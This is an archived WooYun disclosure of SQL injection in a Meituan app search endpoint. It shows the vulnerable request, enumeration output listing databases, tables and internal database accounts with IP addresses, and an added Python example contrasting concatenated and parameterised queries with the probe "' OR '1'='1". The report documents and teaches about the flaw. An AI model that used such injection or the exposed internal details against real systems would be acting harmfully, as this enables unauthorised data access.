WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online ------------------------- http://drop.zone.ci/
2013-12-09: Details sent to the vendor, awaiting vendor handling
2013-12-09: Vendor confirmed; details disclosed to the vendor only
2013-12-19: Details disclosed to core white hats and relevant domain experts
2013-12-29: Details disclosed to regular white hats
2014-01-08: Details disclosed to intern white hats
2014-01-23: Details disclosed to the public
Last night I went out for hotpot. My wife said a group-buy deal would save us 20 yuan, so she happily pulled out the Meituan app, and I took the chance to poke around. The app series I thought I had wrapped up is back...
Affected Meituan apps: Meituan Restaurant + Meituan Waimai + ... The request is as follows:
GET /woodpecker/poi/search?condition= HTTP/1.1
Host: xianfu.meituan.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip
User-Agent: 美团餐厅 1.2 (iPhone; iPhone OS 7.0.4; zh_CN)
Connection: keep-alive
Cookie: 1=_from
The condition= parameter is injectable.
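As an added example, not code from the original report or from Meituan: a small Python model of a restaurant search endpoint that shows why a condition filter assembled by string concatenation is injectable and how parameter binding closes the hole. The poi_info table, its columns and the sample rows are constructed assumptions, not the real schema.

```python
import sqlite3

# Constructed sample data standing in for the restaurant search backend.
# Table and column names are assumptions, not the schema from the report.
SAMPLE_POIS = [
    ("Hotpot House", "Chaoyang"),
    ("Noodle Bar", "Haidian"),
    ("Sushi Corner", "Dongcheng"),
]


def make_db():
    """Build an in-memory database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE poi_info (name TEXT, district TEXT)")
    conn.executemany("INSERT INTO poi_info VALUES (?, ?)", SAMPLE_POIS)
    return conn


def search_poi_unsafe(conn, condition):
    """Defective pattern: the value of condition= is spliced into the SQL text.

    A single quote in the input closes the string literal, so the rest of the
    input is parsed as SQL grammar instead of being matched as data.
    """
    sql = "SELECT name FROM poi_info WHERE name LIKE '%" + condition + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_poi_safe(conn, condition):
    """Hardened pattern: the value is bound as a parameter.

    The driver sends the pattern separately from the statement, so quotes or
    operators inside it can never change the query's structure.
    """
    sql = "SELECT name FROM poi_info WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + condition + "%",))]


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"  # constructed tautology input for the comparison
    print("unsafe:", search_poi_unsafe(db, probe))  # every row comes back
    print("safe:  ", search_poi_safe(db, probe))    # no row matches the literal
```

The same input returns the whole table through the concatenated query and nothing through the bound one; the only difference between the two functions is where the value enters the statement.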
Current user and database
Current database
Database: woodpecker
[52 tables]
+-----------------------+
| accesstoken           |
| activemq_info         |
| app                   |
| app_release_info      |
| banner                |
| canting_user          |
| customer_requirements |
| desk_class            |
| desk_order            |
| desk_order_window     |
| dining_table          |
| filter_user           |
| food                  |
| food_choose_feature   |
| food_feature_count    |
| food_material         |
| food_offer            |
| food_order            |
| food_practice         |
| food_practice_value   |
| food_relation         |
| food_set              |
| food_tag              |
| food_tag_value        |
| food_taste            |
| food_unit             |
| log_info              |
| meituan_outer_food    |
| meituan_outer_order   |
| meituan_outer_poi     |
| order_code            |
| order_offer           |
| ordered_food          |
| ordered_reward        |
| outer_system          |
| pad_info              |
| poi_env               |
| poi_info              |
| poi_member_stat       |
| poi_reward            |
| poi_score_rules       |
| printer               |
| return_food_reason    |
| score_event           |
| special_food          |
| statistics_trend      |
| tmp                   |
| tmp_order_code        |
| user_feedback         |
| user_loyalty          |
| wait_queue            |
| waiter                |
+-----------------------+
Database dump: Meituan Restaurant
Database: xianfu
[36 tables]
+--------------------------+
| accesstoken              |
| activity_coupon          |
| card_manager_coupon_code |
| cardmanager_log          |
| channel                  |
| client_behaviour         |
| client_event             |
| client_register          |
| client_version           |
| coupon                   |
| coupon_account           |
| coupon_account_cookie    |
| coupon_batchsend         |
| coupon_channel           |
| coupon_code              |
| coupon_consume           |
| coupon_customer          |
| coupon_deal              |
| coupon_poi               |
| couponverify_log         |
| customer                 |
| customer_action_h        |
| customer_behaviour       |
| customer_demo            |
| customer_meituan         |
| customer_poi             |
| customer_relation        |
| customer_weixin          |
| customer_weixin_aptcha   |
| fastverify_log           |
| poi_sync                 |
| share_group              |
| share_group_c            |
| super_coupon_info        |
| super_coupon_login       |
| white_list               |
+--------------------------+
Database: xianfu
Table: coupon
[17 columns]
+------------------+---------------+
| Column           | Type          |
+------------------+---------------+
| alertsms         | varchar(1024) |
| brandname        | varchar(255)  |
| content          | varchar(1024) |
| couponpic        | varchar(255)  |
| ctime            | int(11)       |
| duration         | int(4)        |
| etime            | int(11)       |
| event_expiretime | int(11)       |
| event_type       | int(5)        |
| id               | int(11)       |
| sms              | varchar(1024) |
| status           | int(3)        |
| stime            | int(11)       |
| title            | varchar(1024) |
| type             | int(2)        |
| utime            | int(11)       |
| warn             | int(11)       |
+------------------+---------------+
Meituan Waimai database
Database: waimai
[25 tables]
+----------------------------+
| wm_address                 |
| wm_app_channel             |
| wm_app_version             |
| wm_channel                 |
| wm_discount                |
| wm_food                    |
| wm_food_import             |
| wm_food_tag                |
| wm_gao_poi_info            |
| wm_log                     |
| wm_order                   |
| wm_order_detail            |
| wm_order_detail_history    |
| wm_order_history           |
| wm_order_status_utimestamp |
| wm_poi                     |
| wm_poi_match               |
| wm_poi_tag                 |
| wm_poi_tag_dic             |
| wm_poi_utimestamp          |
| wm_push_client             |
| wm_tradearea_point         |
| wm_user                    |
| wm_user_dialogue           |
| wm_user_topic              |
+----------------------------+
I won't bother explaining what the individual fields are. Finally, the databases:
available databases [11]:
[*] biz_auth
[*] information_schema
[*] mysql
[*] pangolin
[*] performance_schema
[*] test
[*] test_waimai
[*] waimai
[*] woodpecker
[*] xfbase
[*] xianfu
See that pangolin database? Better check whether your pants are still on. Users: all sorts of admin and root accounts.
database management system users [183]:
[*] 'admin'@'10.64.10.104'
[*] 'admin'@'localhost'
[*] 'meituan_in'@'10.%'
[*] 'monitor'@'10.%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'skrepl'@'10.%'
[*] 'superadmin'@'10.64.10.104'
[*] 'xianfu_waimai'@'10.%'
I've already given you free publicity, what more do you want -0-
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2013-12-09 10:28
Thank you for your attention to Meituan; the issue is being handled.
None yet